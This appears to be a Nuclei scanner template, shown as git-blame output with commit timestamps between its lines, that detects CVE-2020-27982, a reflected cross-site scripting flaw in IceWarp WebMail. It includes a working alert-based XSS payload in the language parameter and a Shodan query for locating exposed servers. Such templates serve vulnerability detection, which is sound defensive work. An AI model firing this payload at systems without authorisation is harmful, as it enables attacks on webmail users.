2021-02-14 20:58:07 +00:00
|
|
|
id: CVE-2020-27982
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-02-14 20:58:07 +00:00
|
|
|
info:
|
2022-08-16 14:14:41 +00:00
|
|
|
name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting
|
2021-02-14 20:58:07 +00:00
|
|
|
author: madrobot
|
|
|
|
severity: medium
|
2022-08-16 14:14:41 +00:00
|
|
|
description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://cxsecurity.com/issue/WLB-2020100161
|
2022-08-16 14:14:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-27982
|
2022-08-19 20:55:50 +00:00
|
|
|
- http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-27982
|
|
|
|
cwe-id: CWE-79
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00178
|
2023-07-11 19:49:27 +00:00
|
|
|
cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:*
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-percentile: 0.54259
|
2022-07-10 09:37:46 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-07-10 09:37:46 +00:00
|
|
|
shodan-query: title:"icewarp"
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: icewarp
|
|
|
|
product: mail_server
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: xss,icewarp,packetstorm,cve,cve2020
|
2021-02-14 20:58:07 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-02-14 20:58:07 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
|
2021-02-15 19:05:52 +00:00
|
|
|
|
2021-02-14 20:58:07 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-02-14 20:58:07 +00:00
|
|
|
words:
|
|
|
|
- "<img src=x onerror=alert(1)>"
|
2021-02-15 19:05:52 +00:00
|
|
|
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: header
|
2021-02-15 19:05:52 +00:00
|
|
|
words:
|
|
|
|
- "text/html"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|